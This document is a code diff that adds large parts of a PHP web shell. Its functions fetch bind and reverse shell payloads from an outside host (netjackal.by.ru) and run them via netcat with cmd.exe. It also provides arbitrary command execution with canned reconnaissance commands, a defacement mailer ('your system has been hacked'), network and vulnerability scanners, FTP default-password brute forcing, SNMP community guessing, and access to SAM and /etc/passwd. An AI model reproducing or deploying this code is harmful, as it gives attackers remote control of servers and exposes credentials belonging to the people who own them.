+global $errorbox, $windows,$et,$hcwd;
+$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
+$addr='http://netjackal.by.ru/backdoor';
+$error="$errorbox Can not make backdoor file, go to writeable folder.$et";
+$n=namE();
+if(!$windows)$n=".$n";
+$d=whereistmP();
+$name=$d.DIRECTORY_SEPARATOR.$n;
+$perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl';
+$c=($_REQUEST['C'])?1:0;
+if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){
+$port=(int)$_REQUEST['port'];
+if($windows){
+if($c){
+$name.=".exe";
+$bd=downloadiT("$addr/nc.exe",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");
+}else{
+$name = $name.".pl";
+$bd=downloadiT("$addr/winbind.pl",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("perl.exe $name $port");
+}
+}
+else{
+if($c){
+$bd=downloadiT("$addr/bind.c",$name);
+if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");
+}else{
+$bd=downloadiT("$addr/bind.pl",$name);
+if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &");
+echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>";
+}
+}
+}
+elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){
+$ip=$_REQUEST['ip'];
+$port=(int)$_REQUEST['rport'];
+if($windows){
+if($c){
+$name.='.exe';
+$bd=downloadiT("$addr/nc.exe",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");
+}else{
+$name = $name.".pl";
+$bd=downloadiT("$addr/winrc.pl",$name);
+shelL("attrib +H $name");
+if (!$bd)echo $error; else shelL("perl.exe $name $ip $port");
+}
+}
+else{
+if($c){
+$bd=downloadiT("$addr/rc.c",$name);
+if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
+}else{
+$bd=downloadiT("$addr/rc.pl",$name);
+if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &");
+}
+}
+echo "<font color=blue>Done!</font>";}
+else{echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"50%\" bgcolor=\"#333333\">Bind shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=port value=55501 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input type=submit class=buttons value=Bind></td></tr></form></table></td><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"40%\" bgcolor=\"#333333\">Reverse shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#808080\">IP:</td><td bgcolor=\"#808080\"><input type=text name=ip value=";echo $_SERVER["REMOTE_ADDR"]; echo " size=17></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=rport value=53 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Connect></td></tr></form></table>$et";}}
+function showimagE($img){
+echo "<center><img border=0 src=\"".hlinK("imagE=$img&&workingdiR=".getcwd())."\"></center>";}
+function editoR($file){
+global $errorbox,$et,$hcwd;
+if (is_file($file)){
+if (!is_readable($file)){echo "$errorbox File is not readable$et<br>";}
+if (!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";}
+$data = file_get_contents($file);
+echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\">$hcwd<input type=text value=\"".htmlspecialchars($file)."\" size=75 name=file><input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"64\">";
+echo htmlspecialchars($data);
+echo "</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"$file\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">";
+}
+else {echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\"><input type=text value=\"".getcwd()."\" size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"63\"></textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"".getcwd()."\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">";
+}
+echo "$hcwd<input type=submit class=buttons name=Save value=Save></td></form></tr></table></center>";
+}
+function webshelL(){
+global $windows,$hcwd;
+if($windows){
+$alias="<option value=\"netstat -an\">Display open ports</option><option value=\"tasklist\">List of processes</option><option value=\"systeminfo\">System information</option><option value=\"ipconfig /all\">IP configuration</option><option value=\"getmac\">Get MAC address</option><option value=\"net start\">Services list</option><option value=\"net view\">Machines in domain</option><option value=\"net user\">Users list</option><option value=\"gpresult\">Group policy</option><option value=\"shutdown -s -f -t 1\">Turn off the server</option>";
+}
+else{
+$alias="<option value=\"netstat -an | grep -i listen\">Display open ports</option><option value=\"last -a -n 250 -i\">Show last 250 logged in users</option><option value=\"which wget curl lynx w3m\">Downloaders</option><option value=\"find / -perm -2 -type d -print\">Find world-writable directories</option><option value=\"find . -perm -2 -type d -print\">Find world-writable directories(in current directory)</option><option value=\"find / -perm -2 -type f -print\">Find world-writable files</option><option value=\"find . -perm -2 -type f -print\">Find world-writable files(in current directory)</option><option value=\"find / -type f -perm 04000 -ls\">Find files with SUID bit set</option><option value=\"find / -type f -perm 02000 -ls\">Find files with SGID bit set</option><option value=\"find / -name .htpasswd -type f\">Find .htpasswd files</option><option value=\"find / -type f -name .bash_history\">Find .bash_history files</option><option value=\"cat /etc/syslog.conf\">View syslog.conf</option><option value=\"cat cat /etc/hosts\">View hosts</option><option value=\"ps auxw\">List of processes</option>";
+if(is_dir('/etc/valiases'))$alias.="<option value=\"ls -l /etc/valiases\">List of Cpanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value=\"ls -l /etc/vdomainaliases\">List Cpanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value=\"cat /var/cpanel/accounting.log\">Display Cpanel`s log</option>";
+if(is_dir('/var/spool/mail/'))$alias.="<option value=\"ls /var/spool/mail/\">Mailboxes list</option>";
+}
+echo "<center><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=82 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><tr><td><b>Web Shell:</b></td></tr><td bgcolor=\"#666666\"><textarea rows=\"22\" cols=\"78\">";
+if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']);
+echo"</textarea></td></tr><form method=post><tr><td bgcolor=\"#808080\"><input type=text size=91 name=cmd value=\"";if (!empty($_REQUEST['cmd'])) echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows) echo "cat /etc/passwd";echo "\">$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor=\"#808080\"><select name=\"cmd\" width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></table><center>";
+}
+function maileR(){
+global $msgbox,$et,$hcwd;
+$cwd= getcwd();
+if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){
+$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];
+if (!mail($to,$subject,$body,"From: $from"))break;
+echo "$msgbox<b>Mail sent!</b><br>$et";
+}
+echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td><b>Mailer:</b></td></tr><td width=\"20%\" bgcolor=\"#666666\">SMTP</td><td bgcolor=\"#666666\">".ini_get('SMTP')." (".ini_get('smtp_port').")</td></tr><tr><td bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\"><input name=from type=text value=\"evil@hell.gov\" size=55>$hcwd</td><tr><td width=\"25%\" bgcolor=\"#666666\">To:</td><td bgcolor=\"#666666\"><input name=to type=text value=\""; if (!empty($_REQUEST['to'])) echo htmlspecialchars($_REQUEST['to']); elseif(!empty($_ENV["SERVER_ADMIN"])) echo $_ENV["SERVER_ADMIN"];else echo "admin@".getenv('HTTP_HOST'); echo "\" size=55></td></tr><tr><td bgcolor=\"#808080\">Subject:</td><td bgcolor=\"#808080\"><input name=subject type=text value=\"YOUR SERVER HAS BEED HACKED :-P\" size=55></td><tr><td bgcolor=\"#666666\">Body:</td><td bgcolor=\"#666666\"><textarea rows=\"18\" cols=\"43\" name=body>Admin, your system has been hacked! if you don`t seCure it, next time i`ll format your box.</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=\"right\"><input type=submit class=buttons value=Send></form>$et";
+}
+function scanneR(){
+global $hcwd;
+if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1";
+$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
+if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
+$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0;
+echo "<font color=blue>Port scanning started against ".htmlspecialchars($target).":<br>";
+$start=time();
+for($i=$from;$i<=$to;$i++){
+if($tcp){
+if (checkthisporT($target,$i,$timeout)){
+$nu++;
+$ser="";
+if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";
+echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>";
+}
+}
+if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";}
+flusheR();
+}
+$time=time()-$start;
+echo "Done! ($time seconds)</font>";
+}
+elseif (!empty($_REQUEST['securityscanner'])){
+echo "<font color=blue>";
+$start=time();
+$from=$_REQUEST['from'];
+$to=(int)$_REQUEST['to'];
+$timeout=(int)$_REQUEST['timeout'];
+$f = substr($from,strrpos($from,".")+1);
+$from = substr($from,0,strrpos($from,"."));
+if(!empty($_REQUEST['httpscanner'])){
+echo "Loading webserver bug list...";
+flusheR();
+$buglist=whereistmP().DIRECTORY_SEPARATOR.namE();
+$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
+if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>";
+flusheR();
+}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";}
+for($i=$f;$i<=$to;$i++){
+$output=0;
+$ip="$from.$i";
+if(!empty($_REQUEST['nslookup'])){
+$hn=gethostbyaddr($ip);
+if($hn!=$ip)echo "$ip [$hn]<br>";}
+flusheR();
+if(!empty($_REQUEST['ipscanner'])){
+$port=$_REQUEST['port'];
+if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port;
+$open=$ser="";
+foreach($p as $po){
+$scan=checkthisporT($ip,$po,$timeout);
+if ($scan){
+$ser="";
+if($ser=getservbyport($po,"tcp"))$ser="($ser)";
+$open.=" $po$ser ";
+}
+}
+if($open){echo "$ip) Open ports:$open<br>";$output=1;}
+flusheR();
+}
+if(!empty($_REQUEST['httpbanner'])){
+$res=get_sw_namE($ip,$timeout);
+if($res){
+echo "$ip) Webserver software: ";
+if($res==-1)echo "Unknow";
+else echo $res;
+echo "<br>";
+$output=1;
+}
+flusheR();
+}
+if(!empty($_REQUEST['httpscanner'])){
+if(checkthisporT($ip,80,$timeout) && !empty($file)){
+$admin=array('/admin/','/adm/');
+$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
+$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
+$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
+foreach ($file as $v){
+$vuln=array();
+$v=trim($v);
+if(!$v || $v{0}=='#')continue;
+$v=str_replace('","','^',$v);
+$v=str_replace('"','',$v);
+$vuln=explode('^',$v);
+$page=$cqich=$nukech=$adminch=$userch=$vuln[1];
+if(strstr($page,'@CGIDIRS'))
+foreach($cgi as $cg){
+$cqich=str_replace('@CGIDIRS',$cg,$page);
+$url="http://$ip$cqich";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+elseif(strstr($page,'@ADMINDIRS'))
+foreach ($admin as $cg){
+$adminch=str_replace('@ADMINDIRS',$cg,$page);
+$url="http://$ip$adminch";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+elseif(strstr($page,'@USERS'))
+foreach ($users as $cg){
+$userch=str_replace('@USERS',$cg,$page);
+$url="http://$ip$userch";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+elseif(strstr($page,'@NUKE'))
+foreach ($nuke as $cg){
+$nukech=str_replace('@NUKE',$cg,$page);
+$url="http://$ip$nukech";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+else{
+$url="http://$ip$page";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+}
+}
+}
+if(!empty($_REQUEST['smtprelay'])){
+if(checkthisporT($ip,25,$timeout)){
+$res='';
+$res=checksmtP($ip,$timeout);
+if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR();
+}
+}
+if(!empty($_REQUEST['snmpscanner'])){
+if(checkthisporT($ip,161,$timeout,1)){
+$com=$_REQUEST['com'];
+$coms=$res="";
+if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
+foreach ($c as $v){
+$ret=snmpchecK($ip,$v,$timeout);
+if($ret)$coms .=" $v ";
+}
+if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
+flusheR();
+}
+}
+if(!empty($_REQUEST['ftpscanner'])){
+if(checkthisporT($ip,21,$timeout)){
+$usps=explode(',',$_REQUEST['userpass']);
+foreach ($usps as $v){
+$user=substr($v,0,strpos($v,':'));
+$pass=substr($v,strpos($v,':')+1);
+if($pass=='[BLANK]')$pass='';
+$ftp=@ftp_connect($ip,21,$timeout);
+if ($ftp){
+if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";}
+}
+flusheR();
+}
+}
+}
+if($output)echo "<hr size=1 noshade>";
+flusheR();
+}
+$time=time()-$start;
+echo "Done! ($time seconds)</font>";
+if(!empty($buglist))unlink($buglist);
+}
+else{
+$chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
+echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
+$host = substr($host,0,strrpos($host,"."));
+echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
+}
+}
+function sysinfO(){
+global $windows,$disablefunctions,$safemode;
+$cwd= getcwd();
+$mil="<a target=\"_blank\" href=\"http://www.milw0rm.org/related.php?program=";
+$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
+if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
+$osver=$tsize=$fsize='';
+if ($windows){ 
+$osver = "  (".shelL("ver").")";
+$sysroot = shelL("echo %systemroot%");
+if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
+if (empty($sysroot)) $sysroot = getenv("windir");
+if (empty($sysroot)) $sysroot = "Not Found";
+if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
+for ($i=66;$i<=90;$i++){
+$drive= chr($i).':\\';
+if (is_dir($drive)){
+$fsize+=@disk_free_space($drive);
+$tsize+=@disk_total_space($drive);
+}
+}
+}else{
+$fsize=disk_free_space('/');
+$tsize=disk_total_space('/');
+}
+$disksize="Used spase: ". showsizE($tsize-$fsize) . "   Free space: ". showsizE($fsize) . "   Total space: ". showsizE($tsize);
+if (empty($CPU)) $CPU = "Unknow";
+$os = php_unamE();
+$osn=php_unamE('s');
+if(!$windows){ 
+$ker = php_unamE('r');
+$o=($osn=="Linux")?"Linux+Kernel":$osn;
+$os = str_replace($osn,"${mil}$o\">$osn</a>",$os);
+$os = str_replace($ker,"${mil}Linux+Kernel\">$ker</a>",$os);
+$inpa=':';
+}else{
+$sam = $sysroot."\\system32\\config\\SAM";
+$inpa=';';
+$os = str_replace($osn,"${mil}MS+Windows\">$osn</a>",$os);
+}
+$software=str_replace("Apache","${mil}Apache\">Apache</a>",$_SERVER['SERVER_SOFTWARE']);
+echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td>Server information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Operation system:</td><td bgcolor=\"#808080\">$os$osver</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Web server application:</td><td bgcolor=\"#666666\">$software</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">CPU:</td><td bgcolor=\"#808080\">$CPU</td></tr><td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">User domain:</td><td bgcolor=\"#808080\">";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">User name:</td><td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo "</td></tr>";
+if ($windows){
+echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Windows directory:</td><td bgcolor=\"#808080\"><a href=\"".hlinK("seC=fm&workingdiR=$sysroot")."\">$sysroot</a></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">Readable</a>"; else echo "Not readable";echo "</td></tr>";
+}
+else
+{
+echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Passwd file:</td><td bgcolor=\"#808080\">";
+if (is_readable('/etc/passwd')) echo "<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">";
+if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\">Readable</a>"; else echo "Not readable";}else echo "Not found";
+echo "</td></tr>";
+}
+$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
+echo "<tr><td width=\"25%\" bgcolor=\"#808080\">${mil}PHP\">PHP</a> version:</td><td bgcolor=\"#808080\"><a href=\"?=".php_logo_guid()."\" target=\"_blank\">".PHP_VERSION."</a> (<a href=\"".hlinK("seC=phpinfo&workingdiR=$cwd")."\">more...</a>)</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td><td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\">".zend_version()."</a>";else echo "Not Found";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Include path:</td><td bgcolor=\"#808080\">".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td><tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td><td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Disabled functions:</td><td bgcolor=\"#808080\">";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$safemode</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Open base dir:</td><td bgcolor=\"#808080\">$basedir</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td><td bgcolor=\"#666666\">";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle</a> ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" bgcolor=\"#808080\">cURL support:</td><td bgcolor=\"#808080\">Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "<tr><td>User information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">$uip</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Agent:</td><td bgcolor=\"#808080\">".getenv('HTTP_USER_AGENT')."</td></tr></table>";
+}
+function checksuM($file){
+global $et;
+echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td width=\"10%\" bgcolor=\"#666666\"><b>MD5:</b> <font color=#F0F0F0>".md5_file($file)."</font><br><b>SHA1:</b> <font color=#F0F0F0>".sha1_file($file)."</font>$et";
+}
+function listdiR($cwd,$task){
+$c= getcwd();
+$dh = opendir($cwd);
+while ($cont=readdir($dh)){
+if($cont=='.' || $cont=='..')continue;
+$adr = $cwd.DIRECTORY_SEPARATOR.$cont;
+switch ($task){
+case '0':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
